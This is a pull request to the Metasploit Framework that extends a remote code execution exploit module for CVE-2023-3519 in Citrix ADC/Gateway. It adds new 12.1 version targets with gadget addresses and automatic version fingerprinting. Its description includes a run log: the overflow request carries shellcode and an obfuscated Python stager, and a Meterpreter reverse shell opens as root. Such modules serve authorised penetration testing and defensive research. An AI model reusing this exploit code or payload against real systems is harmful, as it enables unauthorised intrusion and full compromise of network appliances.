### PR TITLE
Add 12.1 Targets for CVE-2023-3519

### DIFF
--- a/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
+++ b/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
@@ -24,6 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Ron Bowes', # Analysis and module
           'Douglass McKee', # Analysis and module
           'Spencer McIntyre', # Just the module
+          'rwincey' # Version detection
         ],
         'References' => [
           ['CVE', '2023-3519'],
@@ -40,6 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'DisableNops' => true
         },
         'Targets' => [
+          [ 'Automatic Targeting', {} ],
           # In some versions the epilogue reads directly from rbp and since the exploit clobbers it, the value needs to
           # be restored. In these cases return_rbp_adjustment is defined in the target. If the epilogue pops the values
           # from the stack, then RBP doesn't need to be restored and return_rbp_adjustment can be left undefined.
@@ -50,7 +52,8 @@ class MetasploitModule < Msf::Exploit::Remote
               'fixup_rsp_adjustment' => 0x13a8,
               'popen' => 0x01da6340,
               'return' => 0x00611ae9, # jmp rsp; ns_create_cfg_nsp
-              'return_offset' => 168
+              'return_offset' => 168,
+              'timestamp' => 1685774354
             },
           ],
           [
@@ -60,7 +63,8 @@ class MetasploitModule < Msf::Exploit::Remote
               'fixup_rsp_adjustment' => 0x13a8,
               'popen' => 0x01d7e320,
               'return' => 0x015d131d, # jmp rsp; tfocookie_send_callback
-              'return_offset' => 168
+              'return_offset' => 168,
+              'timestamp' => 1669199920
             },
           ],
           [
@@ -71,7 +75,8 @@ class MetasploitModule < Msf::Exploit::Remote
               'fixup_rbp_adjustment' => 0x190,
               'popen' => 0x01f42ec0,
               'return' => 0x024883bf, # jmp rsp; ns_pixl_eval_nvlist_t_typecast_list_t_dynamic
-              'return_offset' => 168
+              'return_offset' => 168,
+              'timestamp' => 1684144411
             }
           ],
           [
@@ -117,19 +122,54 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    # version 13.x resource path
     res = send_request_cgi({
       'uri' => normalize_uri(datastore['TARGETURI'], 'logon', 'LogonPoint', 'index.html')
     })
-
     return CheckCode::Unknown if res.nil?
 
-    return CheckCode::Safe unless res.code == 200 && res.body =~ /<title class="_ctxstxt_NetscalerGateway">/
+    if res.code == 200 && res.body =~ /<title class="_ctxstxt_NetscalerGateway">/
+      mytarget = get_target
+      return CheckCode::Appears("Detected #{mytarget.name}.") if mytarget
 
-    CheckCode::Detected
+      return CheckCode::Detected
+    end
+
+    # version 12.x resource path
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'vpn', 'index.html')
+    })
+    return CheckCode::Unknown if res.nil?
+
+    if res.code == 200 && res.body =~ /Citrix Gateway/ && res.body =~ /AccessGateway\.ico/
+      return CheckCode::Detected
+    end
+
+    CheckCode::Safe
+  end
+
+  def get_target
+    return @detected_target if @detection_ran
+
+    @detection_ran = true
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'logon', 'LogonPoint', 'init.js')
+    })
+
+    return nil unless res&.headers&.[]('Last-Modified').present?
+
+    timestamp = DateTime.parse(res.headers['Last-Modified']).to_i
+    @detected_target = targets.select { |t| t.opts['timestamp'] == timestamp }.first
   end
 
   def exploit
-    shellcode = Metasm::Shellcode.assemble(Metasm::X64.new, Template.render(<<-SHELLCODE, target: target)).encode_string
+    mytarget = target
+    if mytarget.name == 'Automatic Targeting'
+      mytarget = get_target
+      fail_with(Failure::NoTarget, 'The target did not match a known fingerprint for automatic targeting.') if mytarget.nil?
+    end
+
+    shellcode = Metasm::Shellcode.assemble(Metasm::X64.new, Template.render(<<-SHELLCODE, target: mytarget)).encode_string
       call loc_popen_arg1
         ; add this to the path for python payloads
         db "export PATH=/var/python/bin:$PATH;"
@@ -157,8 +197,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ret
     SHELLCODE
 
-    buffer = rand_text_alphanumeric(target['return_offset'])
-    buffer << [target['return']].pack('Q')
+    buffer = rand_text_alphanumeric(mytarget['return_offset'])
+    buffer << [mytarget['return']].pack('Q')
     buffer << shellcode.bytes.map { |b| (b < 0xa0) ? '%%%02x' % b : b.chr }.join
 
     send_request_cgi({

--- a/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
+++ b/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'popen' => 0x01da6340,
               'return' => 0x00611ae9, # jmp rsp; ns_create_cfg_nsp
               'return_offset' => 168,
-              'timestamp' => 1685774354
+              'timestamp' => 1685774350
             },
           ],
           [
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'popen' => 0x01d7e320,
               'return' => 0x015d131d, # jmp rsp; tfocookie_send_callback
               'return_offset' => 168,
-              'timestamp' => 1669199920
+              'timestamp' => 1669199916
             },
           ],
           [
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'popen' => 0x01f42ec0,
               'return' => 0x024883bf, # jmp rsp; ns_pixl_eval_nvlist_t_typecast_list_t_dynamic
               'return_offset' => 168,
-              'timestamp' => 1684144411
+              'timestamp' => 1683865450
             }
           ],
           [
@@ -87,7 +87,8 @@ class MetasploitModule < Msf::Exploit::Remote
               'fixup_rbp_adjustment' => 0x120,
               'popen' => 0x01b31e20,
               'return' => 0x007d0845, # jmp rsp; ns_audit_cmd2strrer
-              'return_offset' => 168
+              'return_offset' => 168,
+              'timestamp' => 1669466053
             }
           ],
           [
@@ -98,7 +99,8 @@ class MetasploitModule < Msf::Exploit::Remote
               'fixup_rbp_adjustment' => 0x120,
               'popen' => 0x01b2e960,
               'return' => 0x01333f18, # jmp rsp; nssmpp_process_message_queue
-              'return_offset' => 168
+              'return_offset' => 168,
+              'timestamp' => 1650533675
             }
           ]
         ],
@@ -142,6 +144,9 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown if res.nil?
 
     if res.code == 200 && res.body =~ /Citrix Gateway/ && res.body =~ /AccessGateway\.ico/
+      mytarget = get_target
+      return CheckCode::Appears("Detected #{mytarget.name}.") if mytarget
+
       return CheckCode::Detected
     end
 
@@ -153,7 +158,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     @detection_ran = true
     res = send_request_cgi({
-      'uri' => normalize_uri(datastore['TARGETURI'], 'logon', 'LogonPoint', 'init.js')
+      'uri' => normalize_uri(datastore['TARGETURI'], 'logon', 'fonts', 'citrix-fonts.css')
     })
 
     return nil unless res&.headers&.[]('Last-Modified').present?

--- a/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
+++ b/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
@@ -40,6 +40,9 @@ class MetasploitModule < Msf::Exploit::Remote
           'DisableNops' => true
         },
         'Targets' => [
+          # In some versions the epilogue reads directly from rbp and since the exploit clobbers it, the value needs to
+          # be restored. In these cases return_rbp_adjustment is defined in the target. If the epilogue pops the values
+          # from the stack, then RBP doesn't need to be restored and return_rbp_adjustment can be left undefined.
           [
             'Citrix ADC 13.1-48.47',
             {
@@ -65,8 +68,6 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'fixup_return' => 0x008530a2, # mov rbx, qword [rbp-0x28]; ns_aaa_cookie_valid
               'fixup_rsp_adjustment' => 0x12e0,
-              # in this version the epilogue of ns_aaa_cookie_valid reads directly from rbp and since the exploit
-              # clobbers it, the value needs to be restored
               'fixup_rbp_adjustment' => 0x190,
               'popen' => 0x01f42ec0,
               'return' => 0x024883bf, # jmp rsp; ns_pixl_eval_nvlist_t_typecast_list_t_dynamic
@@ -78,11 +79,20 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'fixup_return' => 0x009babca, # mov rbx, qword [rbp-0x28]; ns_aaa_client_handler
               'fixup_rsp_adjustment' => 0x1560,
-              # in this version the epilogue of ns_aaa_client_handler reads directly from rbp and since the exploit
-              # clobbers it, the value needs to be restored
               'fixup_rbp_adjustment' => 0x120,
               'popen' => 0x01b31e20,
               'return' => 0x007d0845, # jmp rsp; ns_audit_cmd2strrer
+              'return_offset' => 168
+            }
+          ],
+          [
+            'Citrix ADC 12.1-64.17',
+            {
+              'fixup_return' => 0x009b98aa, # mov rbx, qword [rbp-0x28]; ns_aaa_client_handler
+              'fixup_rsp_adjustment' => 0x1560,
+              'fixup_rbp_adjustment' => 0x120,
+              'popen' => 0x01b2e960,
+              'return' => 0x01333f18, # jmp rsp; nssmpp_process_message_queue
               'return_offset' => 168
             }
           ]

--- a/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
+++ b/modules/exploits/freebsd/http/citrix_formssso_target_rce.rb
@@ -72,6 +72,19 @@ class MetasploitModule < Msf::Exploit::Remote
               'return' => 0x024883bf, # jmp rsp; ns_pixl_eval_nvlist_t_typecast_list_t_dynamic
               'return_offset' => 168
             }
+          ],
+          [
+            'Citrix ADC 12.1-65.25',
+            {
+              'fixup_return' => 0x009babca, # mov rbx, qword [rbp-0x28]; ns_aaa_client_handler
+              'fixup_rsp_adjustment' => 0x1560,
+              # in this version the epilogue of ns_aaa_client_handler reads directly from rbp and since the exploit
+              # clobbers it, the value needs to be restored
+              'fixup_rbp_adjustment' => 0x120,
+              'popen' => 0x01b31e20,
+              'return' => 0x007d0845, # jmp rsp; ns_audit_cmd2strrer
+              'return_offset' => 168
+            }
           ]
         ],
         'DefaultOptions' => {


### PR DESCRIPTION
This adds two more targets as [requested](https://github.com/rapid7/metasploit-framework/pull/18240#issuecomment-1665495490) to the exploit for CVE-2023-3519. The added targets are 12.1-65.25, and 12.1-64.17. In both of these cases, my technique to fixup the stack by skipping into the `ns_aaa_cookie_valid` frame was failing. I'm pretty certain that the return value from `ns_aaa_cookie_valid` was not being checked so when the exploit sets it to NULL, it'd cause a crash later on. To address this, the exploit goes up a frame higher in the stack to `ns_aaa_client_handler`. Unfortunately, this means that no HTTP response is sent to the client. The exploit didn't check it anyways so it's not a big deal.

This also adds automatic targeting based on the `Last-Modified` header of the `logon/fonts/citrix-fonts.css` resource. Each supported target has a different timestamp fingerprint and the exploit can use this value to detect the version and automatically select the correct target.

## Verification

List the steps needed to make sure this thing works

- [ ] Set up a vulnerable instance of 12.1
- [ ] Set the TARGET appropriately 
- [ ] Run the exploit and get a shell

```
msf6 exploit(freebsd/http/citrix_formssso_target_rce) > [*] Reloading module...

[*] Started reverse TCP handler on 192.168.159.128:4444 
[!] AutoCheck is disabled, proceeding with exploitation
####################
# Request:
####################
GET /gwtest/formssso?event=start&target=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?3    �%33%02%00%00%65%78%70%6f%72%74%20%50%41%54%48%3d%2f%76%61%72%2f%70%79%74%68%6f%6e%2f%62%69%6e%3a%24%50%41%54%48%3b%65%63%68%6f%20%65%78%65%63%5c%28%5f%5f%69%6d%70%6f%72%74%5f%5f%5c%28%5c%27%7a%6c%69%62%5c%27%5c%29%2e%64%65%63%6f%6d%70%72%65%73%73%5c%28%5f%5f%69%6d%70%6f%72%74%5f%5f%5c%28%5c%27%62%61%73%65%36%34%5c%27%5c%29%2e%62%36%34%64%65%63%6f%64%65%5c%28%5f%5f%69%6d%70%6f%72%74%5f%5f%5c%28%5c%27%63%6f%64%65%63%73%5c%27%5c%29%2e%67%65%74%65%6e%63%6f%64%65%72%5c%28%5c%27%75%74%66%2d%38%5c%27%5c%29%5c%28%5c%27%65%4e%6f%39%55%45%31%4c%78%44%41%51%50%54%65%2f%6f%72%63%6b%47%4d%4f%32%64%4d%76%75%59%67%55%52%44%79%49%69%75%48%73%54%6b%54%59%64%74%54%52%4e%51%69%61%72%56%66%47%2f%32%35%44%46%4f%63%7a%77%5a%74%36%38%2b%52%67%6d%5a%33%33%49%30%61%6f%52%67%76%6a%57%51%79%65%36%46%71%47%75%42%41%5a%2f%56%45%47%45%59%51%4c%79%61%6e%30%2b%35%34%50%4a%66%57%76%65%67%42%55%72%76%69%4e%5a%38%46%2b%4c%7a%37%42%4a%7a%54%49%46%56%6f%6f%54%33%6a%39%63%33%37%33%73%44%34%38%33%56%2f%63%38%38%71%53%79%78%6f%41%4b%6a%4e%46%69%57%38%71%69%33%73%68%69%76%5a%56%46%75%61%47%69%57%6f%78%48%56%75%65%68%48%55%6b%47%73%77%49%58%6f%6e%79%63%4c%31%45%44%4f%4c%62%6d%52%44%64%70%4c%58%6b%30%72%6c%55%6a%6f%35%65%33%56%4b%44%30%6f%44%37%59%49%76%43%30%65%69%5a%39%63%38%4b%61%6b%38%2f%33%51%55%4f%75%77%62%43%65%58%2b%68%46%72%6a%2f%37%72%35%36%6e%4e%43%63%77%67%32%4c%78%63%74%6d%44%73%70%50%7a%67%4d%6a%53%45%32%52%58%56%7a%48%5a%51%32%53%4b%48%34%70%30%68%37%2b%63%2f%41%48%41%73%46%2b%6a%5c%27%5c%29%5c%5b%30%5c%5d%5c%29%5c%29%5c%29%20%7c%20%65%78%65%63%20%24%28%77%68%69%63%68%20%70%79%74%68%6f%6e%20%7c%7c%20%77%68%69%63%68%20%70%79%74%68%6f%6e%33%20%7c%7c%20%77%68%69%63%68%20%70%79%74%68%6f%6e%32%29%20%2d%00%5f�%02%00%00%00%72%00%5e%48��%60�%01%48%81�%00%02%00%00��%48%31�%48%81�%60%17%00%00%48%89�%48%81�%20%01%00%00%68�%98%9b%00� HTTP/1.1
Host: 192.168.159.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.51


[*] Sending stage (24772 bytes) to 192.168.159.30
####################
# Response:
####################
No response received
[*] Meterpreter session 6 opened (192.168.159.128:4444 -> 192.168.159.30:63147) at 2023-08-04 16:23:41 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : citrix
OS           : FreeBSD 8.4-NETSCALER-12.1 FreeBSD 8.4-NETSCALER-12.1 #0: Thu Apr 21 03:34:54 PDT 2022     root@sjc-bld-bsd84-102:/usr/obj/usr/home/build/adc/usr.src/sys/NS64
Architecture : x64
Meterpreter  : python/freebsd
meterpreter > pwd
/
meterpreter > 
```
